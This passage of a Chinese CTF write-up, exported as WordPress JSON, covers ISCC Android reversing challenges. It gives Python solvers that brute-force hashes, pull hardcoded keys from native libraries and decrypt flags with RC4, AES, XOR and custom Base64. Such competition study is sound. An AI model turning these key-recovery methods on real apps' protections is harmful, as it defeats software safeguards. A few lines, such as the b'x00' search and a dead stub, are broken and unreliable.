\u5019\u9009\u96c6\u3002\n\u7b97\u51fa\u5b83\u7684\u7279\u5f81\u54c8\u5e0c\u3002\n\u5982\u679c\u5b83\u5bf9\u5e94\u7684 p4 \u5019\u9009\u5b58\u5728\uff0c\u5c31\u628a\u62fc\u8d77\u6765\u7684\u6574\u6bb5\u5bc6\u94a5\u8ba1\u7b97 SHA-256\u3002\n\u4e00\u65e6\u78b0\u4e0a .so \u91cc\u7684\u90a3\u4e2a 32 \u5b57\u8282\u5e38\u91cf\uff0c\u5c31\u8bf4\u660e p1 \u5230 p4 \u5168\u90e8\u627e\u5bf9\uff01<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u601d\u8def<\/p>\n\n\n\n
        \u81ea\u52a8\u89e3\u5305\u63d0\u53d6\uff1a \u4ece APK \u4e2d\u63d0\u53d6 .so \u6587\u4ef6\u548c\u52a0\u5bc6\u7684 flag.enc\u3002\n\u7279\u5f81\u7801\u5b9a\u4f4d\uff1a \u76f4\u63a5\u5728 Python \u91cc\u7528 find() \u641c\u7d22\u5341\u516d\u8fdb\u5236\u7279\u5f81\u7801\uff08\u4f8b\u5982\u7528\u6765\u6df7\u6dc6\u671f\u671b\u503c\u7684\u5e38\u91cf\uff09\uff0c\u81ea\u52a8\u628a byte_552D0\u3001\u53d8\u5f02\u5b57\u5178\u548c EXPECTED_SHA256 \u6263\u51fa\u6765\u3002\n\u54c8\u5e0c\u78b0\u649e-\u4e2d\u95f4\u76f8\u9047\u6cd5\uff1a \u7206\u7834\u7c7b\u4f3c foldAscii6ToU24\uff08\u5176\u5b9e\u662f\u4e00\u79cd\u53d8\u5f62\u7684 FNV Hash\uff09\uff0c\u53ef\u4ee5\u91c7\u7528\u4e2d\u95f4\u76f8\u9047\u7684\u601d\u60f3\uff0c\u5c06\u524d 3 \u4e2a\u5b57\u7b26\u7684\u54c8\u5e0c\u7ed3\u679c\u5b58\u8868\uff0c\u518d\u9006\u63a8\u540e 3 \u4e2a\u5b57\u7b26\u53bb\u67e5\u8868\uff0c\u5f88\u5feb\u5c31\u80fd\u8dd1\u5b8c 95^6 \u7684\u7a7a\u95f4\u3002\nRC4 \u89e3\u5bc6\uff1a nativeDecryptFlag \u51fd\u6570\u89e3\u5bc6\u7b97\u6cd5\u672c\u8d28\u4e0a\u5c31\u662f\u4e00\u4e2a\u6807\u51c6\u7684 RC4\u3002\u6ca1\u5fc5\u8981\u8c03\u7528 Frida\uff0c\u76f4\u63a5\u5728 Python \u91cc\u5199\u4e2a RC4 \u51fd\u6570\uff0c\u7528\u7b97\u51fa\u7684 p1+p2+p3+p4 \u4f5c\u4e3a\u5bc6\u94a5\u89e3\u5bc6 flag.enc \u5373\u53ef\u51fa flag\u3002<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        import hashlib\nimport sys\nimport zipfile\nfrom collections import defaultdict\nfrom pathlib import Path\nfrom tempfile import TemporaryDirectory\n\nMASK24 = 0xFFFFFF\nMASK32 = 0xFFFFFFFF\nFNV_OFFSET = 0x811C9DC5\nFNV_PRIME = 0x1000193\nINV_FNV_PRIME = pow(FNV_PRIME, -1, 1 << 32)\nPRINTABLE = list(range(0x20, 0x7F))\nBASE64_STD = b\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/\"\n\nP1 = \"CT.=6`\"\nP1_FNV24 = 0x05EF45\nP2_FNV24 = 0xEFAF45\nP3_FNV24 = 0x25B657\n\ndef rol24(value: int, bits: int) -> int:\n    value &= MASK24\n    bits %= 24\n    return ((value << bits) | (value >> (24 - bits))) & MASK24\n\ndef rc4_crypt(key: bytes, data: bytes) -> bytes:\n    s = list(range(256))\n    j = 0\n    for i in range(256):\n        j = (j + s[i] + key[i % len(key)]) & 0xFF\n        s[i], s[j] = s[j], s[i]\n\n    i = 0\n    j = 0\n    out = bytearray()\n    for b in data:\n        i = (i + 1) & 0xFF\n        j = (j + s[i]) & 0xFF\n        s[i], s[j] = s[j], s[i]\n        out.append(b ^ s[(s[i] + s[j]) & 0xFF])\n    return bytes(out)\n\ndef candidates_for_target(target24: int, want_xor: int = 0) -> list[str]:\n    forward: dict[int, list[tuple[bytes, int]]] = defaultdict(list)\n    for a in PRINTABLE:\n        x1 = ((FNV_OFFSET ^ a) * FNV_PRIME) & MASK32\n        for b in PRINTABLE:\n            x2 = ((x1 ^ b) * FNV_PRIME) & MASK32\n            for c in PRINTABLE:\n                x3 = ((x2 ^ c) * FNV_PRIME) & MASK32\n                forward[x3].append((bytes([a, b, c]), a ^ b ^ c))\n\n    out: list[str] = []\n    for hi in range(256):\n        x6 = (hi << 24) | target24\n        for f in PRINTABLE:\n            x5 = ((x6 * INV_FNV_PRIME) & MASK32) ^ f\n            for e in PRINTABLE:\n                x4 = ((x5 * INV_FNV_PRIME) & MASK32) ^ e\n                for d in PRINTABLE:\n                    x3 = ((x4 * INV_FNV_PRIME) & MASK32) ^ d\n                    if x3 not in forward:\n                        continue\n                    suffix_xor = d ^ e ^ f\n                    for prefix, prefix_xor in forward[x3]:\n                        if (prefix_xor ^ suffix_xor) == want_xor:\n                            out.append((prefix + bytes([d, e, f])).decode(\"ascii\"))\n    return out\n\ndef derive_p4(native_blob: bytes) -> str:\n    marker = bytes.fromhex(\"3d95de8197496a1d5a5a5a5a\")\n    start = native_blob.find(marker)\n    if start == -1:\n        raise RuntimeError(\"marker not found\")\n\n    raw = native_blob[start : start + 8]\n    mask = 0x5A5A5A5A\n    exp = bytes(b ^ ((mask >> ((i * 5) & 31)) & 0xFF) for i, b in enumerate(raw))\n\n    mixed = (P1_FNV24 ^ rol24(P2_FNV24, 3) ^ rol24(P3_FNV24, 7)) & MASK24\n    shift = mixed & 0x3F\n    rotated = bytes(BASE64_STD[(i + shift) & 0x3F] for i in range(64))\n\n    sextets: list[int] = []\n    for i, ch in enumerate(exp):\n        pos = rotated.index(ch)\n        key6 = (mixed >> ((i * 7) % 24)) & 0x3F\n        sextets.append(pos ^ key6)\n\n    out = bytes(\n        [\n            ((sextets[0] << 2) | (sextets[1] >> 4)) & 0xFF,\n            (((sextets[1] & 0xF) << 4) | (sextets[2] >> 2)) & 0xFF,\n            (((sextets[2] & 0x3) << 6) | sextets[3]) & 0xFF,\n            ((sextets[4] << 2) | (sextets[5] >> 4)) & 0xFF,\n            (((sextets[5] & 0xF) << 4) | (sextets[6] >> 2)) & 0xFF,\n            (((sextets[6] & 0x3) << 6) | sextets[7]) & 0xFF,\n        ]\n    )\n    return out.decode(\"ascii\")\n\ndef solve_apk(apk_path: Path) -> tuple[str, str, str, str, str]:\n    with TemporaryDirectory() as tmpdir:\n        tmp = Path(tmpdir)\n        with zipfile.ZipFile(apk_path) as zf:\n            zf.extractall(tmp)\n\n        native = (tmp \/ \"lib\" \/ \"arm64-v8a\" \/ \"libscm_native.so\").read_bytes()\n        flag_enc = (tmp \/ \"assets\" \/ \"flag.enc\").read_bytes()\n\n        digest_prefix = bytes.fromhex(\"51f48602c1f221d096cc8233e187aee64399e99c94e149f912be6cba6a745ee6\")\n        start = native.find(digest_prefix)\n        if start == -1:\n            marker = bytes.fromhex(\"3d95de8197496a1d5a5a5a5a00000000\")\n            base = native.find(marker)\n            if base == -1:\n                raise RuntimeError(\"digest target not found\")\n            digest_target = native[base + 0x10 : base + 0x30]\n        else:\n            digest_target = native[start : start + 32]\n\n        p4 = derive_p4(native)\n\n        p2s = candidates_for_target(P2_FNV24, 0)\n        p3s = candidates_for_target(P3_FNV24, 0)\n\n        for p2 in p2s:\n            for p3 in p3s:\n                key = (P1 + p2 + p3 + p4).encode(\"ascii\")\n                if hashlib.sha256(key).digest() != digest_target:\n                    continue\n                pt = rc4_crypt(key, flag_enc).decode(\"utf-8\")\n                return P1, p2, p3, p4, pt\n\n    raise RuntimeError(\"No solution found\")\n\ndef main() -> int:\n    if len(sys.argv) != 2:\n        return 1\n\n    apk_path = Path(sys.argv[1])\n    p1, p2, p3, p4, flag = solve_apk(apk_path)\n    print(f\"p1 = {p1}\")\n    print(f\"p2 = {p2}\")\n    print(f\"p3 = {p3}\")\n    print(f\"p4 = {p4}\")\n    print(f\"flag = {flag}\")\n    return 0\n\nif __name__ == \"__main__\":\n    sys.exit(main())<\/code><\/pre>\n\n\n\n
        \u7528\u6cd5<\/p>\n\n\n\n
        python exp.py <apk\u540d\u5b57><\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        ISCC{5ae5dea94ace2997c614a97eca11eb329ab075327d779a954f57c0a28897f4c4}<\/code><\/pre>\n\n\n\n
        \u8ff7\u96fe\u9a8c\u8bc1<\/h3>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u770bKeyProvider<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8be5\u51fd\u6570\u8bfb\u53d6 assets\/bin.data\uff0c\u5229\u7528\u786c\u7f16\u7801\u7684 AES \u53c2\u6570\uff08Key: 1234567890abcdef, IV: abcdef1234567890\uff09\u8fdb\u884c\u89e3\u5bc6\u3002\u89e3\u5bc6\u51fa\u7684\u5b57\u7b26\u4e32 b64-key-123 \u662f Native \u5c42\u81ea\u5b9a\u4e49 Base64 \u67e5\u8868\u7684\u504f\u79fb\u79cd\u5b50\u3002<\/code><\/pre>\n\n\n\n
        flag \u6bd4\u8f83\u903b\u8f91\u7684\u5b9e\u73b0\u5728 libmobile01.so<\/code> \u7684 x86_64 \u67b6\u6784\u4e0b\uff0c\u76f4\u63a5\u63d0\u53d6\u6587\u4ef6<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        Java_com_example_mobile01_LocalExecutor_verify \u51fd\u6570<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5265\u79bb ISCC{} \u540e\u622a\u53d6\u5185\u90e8 16 \u5b57\u8282\uff0c\u5206\u53d1\u52a0\u5bc6\uff0c\u5e76\u4e0e\u76ee\u6807\u5bc6\u6587 VYqrN6J92874fce8c7b381f201952\u8fdb\u884c\u6700\u7ec8\u6bd4\u5bf9<\/code><\/pre>\n\n\n\n
        encrypt_full<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u52a0\u5bc6\u5206\u53d1\u5668\u3002\u5c06 16 \u5b57\u8282\u5207\u5206\u4e3a 5\u30016\u30015 \u4e09\u6bb5\uff0c\u4f9d\u6b21\u8c03\u7528 Base64\u3001RC4 \u548c XOR \u903b\u8f91\u3002<\/code><\/pre>\n\n\n\n
        build_keyed_b64_table<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5904\u7406\u524d 5 \u5b57\u8282\u3002\u8bfb\u53d6 Java \u5c42\u89e3\u5bc6\u51fa\u7684 b64-key-123\uff0c\u901a\u8fc7 `sum(key.encode()) & 0x3f` \u8ba1\u7b97\u51fa\u504f\u79fb\u91cf 5\u3002\u5c06\u6807\u51c6\u8868\u4f4d\u79fb\u5f97\u5230\u65b0\u8868FGHIJ..............<\/code><\/pre>\n\n\n\n
        get_rc4_key<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5904\u7406\u4e2d\u95f4 6 \u5b57\u8282\u3002\u5c06\u5b57\u7b26\u4e32 yek\u3001terc\u3001esym \u987a\u5e8f\u62fc\u63a5\u540e\u6574\u4f53\u53cd\u8f6c\uff0c\u751f\u6210\u6700\u7ec8 RC4 \u5bc6\u94a5 mysecretkey\u3002<\/code><\/pre>\n\n\n\n
        get_xor_key<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5904\u7406\u6700\u540e 5 \u5b57\u8282\u3002\u6309 yps.\u3001tffe\u3001.53 \u987a\u5e8f\u62fc\u63a5\u5f97\u5230 yps.tffe.53\uff0c\u7136\u540e\u6bcf\u4f4d\u5b57\u7b26\u7684 ASCII \u7801\u51cf 1\uff0c\u751f\u6210\u5f02\u6216\u5bc6\u94a5 xor-seed-42<\/code><\/pre>\n\n\n\n
        \u6574\u4f53\u5c31\u662f<\/p>\n\n\n\n
        \u76ee\u6807\u5bc6\u6587 VYqrN6J92874fce8c7b381f201952 \u957f\u5ea6\u4e3a 29\uff0c\u6574\u4f53\u62c6\u89e3\u5982\u4e0b\uff1a  \n\u524d 7 \u4f4d VYqrN6J\uff1a\u81ea\u5b9a\u4e49 Base64 \u7f16\u7801\n\u4e2d 12 \u4f4d 92874fce8c7b\uff1aRC4 \u52a0\u5bc6\u5e76\u8f6c Hex\n\u540e 10 \u4f4d 381f201952\uff1a\u5faa\u73af\u5f02\u6216\u5e76\u8f6c Hex<\/code><\/pre>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        import base64\n\ns1 = \"VYqrN6J\"\ns2_hex = \"92874fce8c7b\"\ns3_hex = \"381f201952\"\n\nstd_b64 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/\"\noffset = sum(\"b64-key-123\".encode()) & 0x3f\ncustom_b64 = std_b64[offset:] + std_b64[:offset]\ntr = str.maketrans(custom_b64, std_b64)\np1 = base64.b64decode(s1.translate(tr) + \"=\").decode()\n\nk2 = b\"mysecretkey\"\nc2 = bytes.fromhex(s2_hex)\nS = list(range(256))\nj = 0\nfor i in range(256):\n    j = (j + S[i] + k2[i % len(k2)]) % 256\n    S[i], S[j] = S[j], S[i]\ni = j = 0\nr2 = []\nfor b in c2:\n    i = (i + 1) % 256\n    j = (j + S[i]) % 256\n    S[i], S[j] = S[j], S[i]\n    r2.append(b ^ S[(S[i] + S[j]) % 256])\np2 = bytes(r2).decode()\n\nk3 = b\"xor-seed-42\"\nc3 = bytes.fromhex(s3_hex)\nr3 = []\nfor idx in range(len(c3)):\n    r3.append(c3[idx] ^ k3[idx % len(k3)])\np3 = bytes(r3).decode()\n\nprint(f\"ISCC{{{p1}{p2}{p3}}}\")<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u4e00\u628a\u68ad\u811a\u672c<\/p>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        #!\/usr\/bin\/env python3\nfrom __future__ import annotations\n\nimport argparse\nimport base64\nimport io\nimport itertools\nimport re\nimport sys\nimport zipfile\nfrom pathlib import Path\n\nfrom capstone import Cs, CS_ARCH_X86, CS_MODE_64\nfrom capstone.x86_const import X86_OP_MEM, X86_REG_RIP\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\nfrom elftools.elf.elffile import ELFFile\nfrom elftools.elf.sections import SymbolTableSection\n\nAPK_ASSET = \"assets\/bin.data\"\nSO_CANDIDATES = [\n    \"lib\/x86_64\/libmobile01.so\",\n    \"lib\/x86\/libmobile01.so\",\n    \"lib\/arm64-v8a\/libmobile01.so\",\n    \"lib\/armeabi-v7a\/libmobile01.so\",\n]\nAES_KEY = b\"1234567890abcdef\"\nAES_IV = b\"abcdef1234567890\"\nSTANDARD_B64 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/\"\nSYM_VERIFY = \"Java_com_example_mobile01_LocalExecutor_verify\"\nSYM_RC4 = \"_Z11get_rc4_keyv\"\nSYM_XOR = \"_Z11get_xor_keyv\"\nTARGET_RE = re.compile(rb\"[A-Za-z0-9+\/]{7}[0-9a-f]{22}$\")\nASCII_TAIL_RE = re.compile(rb\"[ -~]{3,16}$\")\n\nclass ElfView:\n    def __init__(self, blob: bytes) -> None:\n        self.blob = blob\n        self._bio = io.BytesIO(blob)\n        self.elf = ELFFile(self._bio)\n\n    def get_symbol(self, name: str) -> tuple[int, int]:\n        for section in self.elf.iter_sections():\n            if not isinstance(section, SymbolTableSection):\n                continue\n            found = section.get_symbol_by_name(name)\n            if found:\n                sym = found[0]\n                return int(sym[\"st_value\"]), int(sym[\"st_size\"])\n        raise KeyError(name)\n\n    def va_to_offset(self, va: int) -> int:\n        for seg in self.elf.iter_segments():\n            if seg[\"p_type\"] != \"PT_LOAD\":\n                continue\n            start = int(seg[\"p_vaddr\"])\n            end = start + int(seg[\"p_filesz\"])\n            if start <= va < end:\n                return int(seg[\"p_offset\"]) + (va - start)\n        raise ValueError(hex(va))\n\n    def read_cstring(self, va: int, max_len: int = 128) -> bytes | None:\n        try:\n            off = self.va_to_offset(va)\n        except ValueError:\n            return None\n        chunk = self.blob[off : off + max_len]\n        end = chunk.find(b\"x00\")\n        if end <= 0:\n            return None\n        s = chunk[:end]\n        if any(b < 0x20 or b >= 0x7F for b in s):\n            return None\n        return s\n\n    def function_bytes(self, name: str) -> tuple[int, bytes]:\n        va, size = self.get_symbol(name)\n        off = self.va_to_offset(va)\n        return va, self.blob[off : off + size]\n\n    def rip_strings(self, name: str, max_len: int = 128) -> list[tuple[int, bytes]]:\n        va, code = self.function_bytes(name)\n        md = Cs(CS_ARCH_X86, CS_MODE_64)\n        md.detail = True\n        seen: set[int] = set()\n        out: list[tuple[int, bytes]] = []\n        for insn in md.disasm(code, va):\n            for op in insn.operands:\n                if op.type != X86_OP_MEM or op.mem.base != X86_REG_RIP:\n                    continue\n                target = insn.address + insn.size + op.mem.disp\n                if target in seen:\n                    continue\n                s = self.read_cstring(target, max_len=max_len)\n                if not s:\n                    continue\n                seen.add(target)\n                out.append((target, s))\n        return out\n\ndef decrypt_asset(blob: bytes) -> str:\n    return unpad(AES.new(AES_KEY, AES.MODE_CBC, AES_IV).decrypt(blob), AES.block_size).decode()\n\ndef build_table(key: str) -> str:\n    shift = sum(key.encode()) & 0x3F\n    return STANDARD_B64[shift:] + STANDARD_B64[:shift]\n\ndef custom_b64_decode(segment: str, table: str) -> bytes:\n    return base64.b64decode(segment.translate(str.maketrans(table, STANDARD_B64)) + \"=\")\n\ndef custom_b64_encode(data: bytes, table: str) -> str:\n    out: list[str] = []\n    value = 0\n    bits = -6\n    for byte in data:\n        value = (value << 8) | byte\n        bits += 8\n        while bits >= 0:\n            out.append(table[(value >> bits) & 0x3F])\n            bits -= 6\n    if bits > -6:\n        out.append(table[((value << 8) >> (bits + 8)) & 0x3F])\n    return \"\".join(out)\n\ndef rc4_crypt(data: bytes, key: bytes) -> bytes:\n    s = list(range(256))\n    j = 0\n    for i in range(256):\n        j = (j + s[i] + key[i % len(key)]) & 0xFF\n        s[i], s[j] = s[j], s[i]\n    i = 0\n    j = 0\n    out = bytearray()\n    for byte in data:\n        i = (i + 1) & 0xFF\n        j = (j + s[i]) & 0xFF\n        s[i], s[j] = s[j], s[i]\n        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])\n    return bytes(out)\n\ndef xor_repeat(data: bytes, key: bytes) -> bytes:\n    return bytes(byte ^ key[i % len(key)] for i, byte in enumerate(data))\n\ndef to_hex(data: bytes) -> str:\n    return \"\".join(f\"{b:02x}\" for b in data)\n\ndef choose_so_name(zf: zipfile.ZipFile) -> str:\n    for name in SO_CANDIDATES:\n        try:\n            zf.getinfo(name)\n            return name\n        except KeyError:\n            pass\n    raise FileNotFoundError(\"libmobile01.so not found\")\n\ndef extract_target(elf: ElfView) -> str:\n    hits = []\n    for _, s in elf.rip_strings(SYM_VERIFY, max_len=96):\n        if TARGET_RE.fullmatch(s):\n            hits.append(s.decode())\n    hits = sorted(set(hits))\n    if len(hits) != 1:\n        raise RuntimeError(f\"target candidates: {hits!r}\")\n    return hits[0]\n\ndef extract_candidates(elf: ElfView, func_name: str) -> list[str]:\n    raw = []\n    for _, s in elf.rip_strings(func_name, max_len=32):\n        if not ASCII_TAIL_RE.fullmatch(s):\n            continue\n        raw.append(s.decode())\n    seen = set()\n    out = []\n    for item in raw:\n        if item in seen:\n            continue\n        seen.add(item)\n        out.append(item)\n    return out\n\ndef derive_keys(target: str, rc4_candidates: list[str], xor_candidates: list[str]) -> tuple[bytes, bytes, bytes, bytes, str, str]:\n    part1_enc = target[:7]\n    part2_enc = bytes.fromhex(target[7:19])\n    part3_enc = bytes.fromhex(target[19:])\n    for b64_key in [decrypt_asset_bytes]:\n        pass\n    raise RuntimeError(\"unreachable\")\n\ndef recover(apk_path: Path) -> dict[str, str]:\n    with zipfile.ZipFile(apk_path, \"r\") as zf:\n        b64_key = decrypt_asset(zf.read(APK_ASSET))\n        elf = ElfView(zf.read(choose_so_name(zf)))\n    target = extract_target(elf)\n    table = build_table(b64_key)\n    part1 = custom_b64_decode(target[:7], table)\n    rc4_enc = bytes.fromhex(target[7:19])\n    xor_enc = bytes.fromhex(target[19:])\n    rc4_candidates = extract_candidates(elf, SYM_RC4)\n    xor_candidates = extract_candidates(elf, SYM_XOR)\n    rc4_orders = []\n    if len(rc4_candidates) >= 3:\n        rc4_orders.append(tuple(rc4_candidates[:3]))\n    rc4_orders.extend(itertools.permutations(rc4_candidates, min(3, len(rc4_candidates))))\n    xor_orders = []\n    if len(xor_candidates) >= 3:\n        xor_orders.append((xor_candidates[2], xor_candidates[0], xor_candidates[1]))\n    xor_orders.extend(itertools.permutations(xor_candidates, min(3, len(xor_candidates))))\n    seen = set()\n    for rc4_perm in rc4_orders:\n        if rc4_perm in seen:\n            continue\n        seen.add(rc4_perm)\n        rc4_key = \"\".join(rc4_perm)[::-1].encode()\n        part2 = rc4_crypt(rc4_enc, rc4_key)\n        if not all(0x20 <= b < 0x7F for b in part2):\n            continue\n        seen_xor = set()\n        for xor_perm in xor_orders:\n            if xor_perm in seen_xor:\n                continue\n            seen_xor.add(xor_perm)\n            xor_seed = \"\".join(xor_perm)\n            xor_key = bytes((ord(ch) - 1) & 0xFF for ch in xor_seed)\n            part3 = xor_repeat(xor_enc, xor_key)\n            if not all(0x20 <= b < 0x7F for b in part3):\n                continue\n            inner = part1 + part2 + part3\n            forward = custom_b64_encode(part1, table) + to_hex(rc4_crypt(part2, rc4_key)) + to_hex(xor_repeat(part3, xor_key))\n            if forward != target:\n                continue\n            return {\n                \"apk\": str(apk_path),\n                \"target\": target,\n                \"b64_key\": b64_key,\n                \"rc4_key\": rc4_key.decode(\"latin1\"),\n                \"xor_key\": xor_key.decode(\"latin1\"),\n                \"inner\": inner.decode(\"latin1\"),\n                \"flag\": f\"ISCC{{{inner.decode('latin1')}}}\",\n            }\n    raise RuntimeError(\"failed to recover keys\")\n\ndef iter_apks(paths: list[str]) -> list[Path]:\n    if paths:\n        return [Path(p) for p in paths]\n    return sorted(Path(\".\").glob(\"*.apk\"))\n\ndef main() -> int:\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"apks\", nargs=\"*\")\n    parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\n    args = parser.parse_args()\n    apks = iter_apks(args.apks)\n    if not apks:\n        print(\"no apk files found\", file=sys.stderr)\n        return 1\n    for apk in apks:\n        info = recover(apk)\n        print(info[\"flag\"])\n        if args.verbose:\n            print(info[\"apk\"])\n            print(info[\"target\"])\n            print(info[\"b64_key\"])\n            print(info[\"rc4_key\"])\n            print(info[\"xor_key\"])\n            print(info[\"inner\"])\n    return 0\n\nif __name__ == \"__main__\":\n    raise SystemExit(main())\n<\/code><\/pre>\n\n\n\n
        ISCC{A9f#QxT7vL2@pR4!}<\/code><\/pre>\n\n\n\n
        \u603b\u7ed3<\/h1>\n\n\n\n
        \u7b2c\u4e00\u6b21\u6253ISCC\uff0c\u539f\u672c\u5c31\u6709\u6240\u8033\u95fb\uff0c\u505a\u4e86\u4e4b\u540e\uff0c\u679c\u7136\u540d\u4e0d\u865a\u4f20\uff0c\u505a\u7684\u771f\u96be\u53d7\uff0c\u9e45\u9e45\u9e45<\/p>\n\n\n\n
        <\/p>\n","protected":false},"excerpt":{"rendered":"
        \u7ec3\u6b66\u9898 \u524d\u8a00 \u9898\u76ee\u6076\u5fc3\uff0cMisc\u4e3a\u4e86\u96be\u800c\u96be\uff0c\u800c\u4e14pwn\u76f4\u63a5\u88ab\u6253\u7a7f\uff0cWeb\u54ea\u4e2a\u8def\u5f84\u8c01\u53ef\u4ee5\u731c\u51fa\u6765\uff1f Misc \u53cc\u6821 […]<\/p>\n","protected":false},"author":1,"featured_media":3890,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,31],"tags":[],"class_list":["post-3744","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","category-iscc"],"_links":{"self":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts\/3744","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3744"}],"version-history":[{"count":2,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts\/3744\/revisions"}],"predecessor-version":[{"id":3892,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/posts\/3744\/revisions\/3892"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=\/wp\/v2\/media\/3890"}],"wp:attachment":[{"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3744"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3744"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjiuctf.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}